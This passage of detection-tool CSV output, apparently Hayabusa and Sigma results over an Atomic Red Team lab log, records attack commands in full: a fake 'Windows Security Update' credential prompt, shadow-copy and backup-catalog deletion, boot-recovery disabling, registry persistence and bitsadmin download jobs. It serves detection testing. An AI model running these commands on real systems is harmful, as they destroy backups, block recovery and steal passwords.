Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\RuntimeVersion: v4.0.30319 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:20.858 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - COM Hijack | SetValue: HKCR\WOW6432Node\CLSID\{17C7DA62-8517-3DF1-A67C-BD4BCD2C5C3F}\InprocServer32\0.0.0.0\CodeBase: file:///C:/AtomicRedTeam/T1121.DLL | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe | PID: 1060 | PGUID: 747F3D96-D7BB-5D31-0000-0010D5092A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:51.883 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4256 | PGUID: 747F3D96-D7DB-5D31-0000-001089A52A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:51.957 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} | Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" | LID: 0x50951 | PID: 4452 | PGUID: 747F3D96-D7DB-5D31-0000-0010B5A82A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:46:51.957 +00:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:21.972 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence or CredAccess - Lsa NotificationPackge | SetValue: HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages: Binary Data | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:21.972 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.096 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 
3968 | PGUID: 747F3D96-D809-5D31-0000-00100A242B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.127 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" | LID: 0x50951 | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.147 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - AppInit | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs: C:\Tools\MessageBox64.dll,C:\Tools\MessageBox32.dll | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.147 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.147 +00:00,MSEDGEWIN10,13,medium,Persis,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_sysmon/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.168 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - via 
Windows Load | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 6056 | PGUID: 747F3D96-D809-5D31-0000-00105C262B00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.168 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:37.215 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D809-5D31-0000-001072292B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:40.691 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6896 | PGUID: 747F3D96-D80C-5D31-0000-0010223C2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:40.706 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: vssadmin.exe delete shadows /all /quiet | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" | LID: 0x50951 | PID: 1124 | PGUID: 
747F3D96-D80C-5D31-0000-0010843F2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:40.706 +00:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:40.863 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1348 | PGUID: 747F3D96-D80C-5D31-0000-001005542B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.585 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4500 | PGUID: 747F3D96-D811-5D31-0000-001000632B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.585 +00:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.624 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wbadmin.exe delete catalog -quiet | Process: C:\Windows\System32\wbadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" | LID: 0x50951 | PID: 6160 | PGUID: 
747F3D96-D811-5D31-0000-001061652B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.624 +00:00,MSEDGEWIN10,1,critical,Evas | Impact,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.624 +00:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.773 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wbengine.exe"" | Process: C:\Windows\System32\wbengine.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:45.958 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\vds.exe | Process: C:\Windows\System32\vds.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3184 | PGUID: 747F3D96-D811-5D31-0000-0010147C2B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:46.112 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2948 | PGUID: 
747F3D96-D812-5D31-0000-0010AC892B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:46.302 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Schedule.Service Module Load | Image: C:\Windows\System32\taskschd.dll | Process: C:\Windows\System32\wbengine.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 6064 | PGUID: 747F3D96-D811-5D31-0000-0010726A2B00 | Hash: SHA1=BE65E71FC691867FFA1D3129CEAB67A0688A08CB,MD5=9A0C13D674AB2D72193653EF38D8FB8E,SHA256=15817A5CB717D4846AE753A27CD8859BCE63004143083027FA5EC9324DFC5188,IMPHASH=5694D579C32F1A7EB5FA54148C174C38",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.816 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-D817-5D31-0000-001064AD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.865 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D817-5D31-0000-001097B02B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.865 
+00:00,MSEDGEWIN10,1,high,Impact,Modification of Boot Configuration,,rules/sigma/process_creation_sysmon/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.997 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6216 | PGUID: 747F3D96-D817-5D31-0000-001049B42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:51.997 +00:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:52.010 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bcdedit.exe /set {default} recoveryenabled no | Process: C:\Windows\System32\bcdedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" | LID: 0x50951 | PID: 5984 | PGUID: 747F3D96-D817-5D31-0000-0010B7B62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:52.010 +00:00,MSEDGEWIN10,1,critical,LatMov | Disc | Evas | Impact,WannaCry Ransomware,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:52.010 +00:00,MSEDGEWIN10,1,high,Impact,Modification of Boot 
Configuration,,rules/sigma/process_creation_sysmon/proc_creation_win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:52.046 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D817-5D31-0000-0010C8BA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:57.227 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1632 | PGUID: 747F3D96-D81D-5D31-0000-0010B8CA2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:47:57.274 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7080 | PGUID: 747F3D96-D81D-5D31-0000-0010D7CD2B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:04.103 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6736 | PGUID: 
747F3D96-D824-5D31-0000-001023F42B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:04.131 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 1540 | PGUID: 747F3D96-D824-5D31-0000-001075F62B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:04.131 +00:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation_sysmon/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:05.365 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5808 | PGUID: 747F3D96-D825-5D31-0000-0010CF222C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.640 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 752 | PGUID: 
747F3D96-D83E-5D31-0000-0010F0D02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.660 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /create AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /create AtomicBITS"" | LID: 0x50951 | PID: 4508 | PGUID: 747F3D96-D83E-5D31-0000-001042D32E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.799 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D83E-5D31-0000-0010A2D72E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.799 +00:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation_sysmon/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.807 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /addfile AtomicBITS 
https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3732 | PGUID: 747F3D96-D83E-5D31-0000-0010AAD92E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.807 +00:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation_sysmon/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.807 +00:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation_sysmon/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.900 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D83E-5D31-0000-001088DE2E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.900 +00:00,MSEDGEWIN10,1,medium,Evas,Monitoring For Persistence Via BITS,,rules/sigma/process_creation_sysmon/proc_creation_win_monitoring_for_persistence_via_bits.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:30.917 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1 | Process: C:\Windows\System32\bitsadmin.exe | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"" | LID: 0x50951 | PID: 3204 | PGUID: 747F3D96-D83E-5D31-0000-0010DAE02E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.012 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4332 | PGUID: 747F3D96-D83E-5D31-0000-001046E52E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:48:31.041 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /complete AtomicBITS | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /complete AtomicBITS"" | LID: 0x50951 | PID: 388 | PGUID: 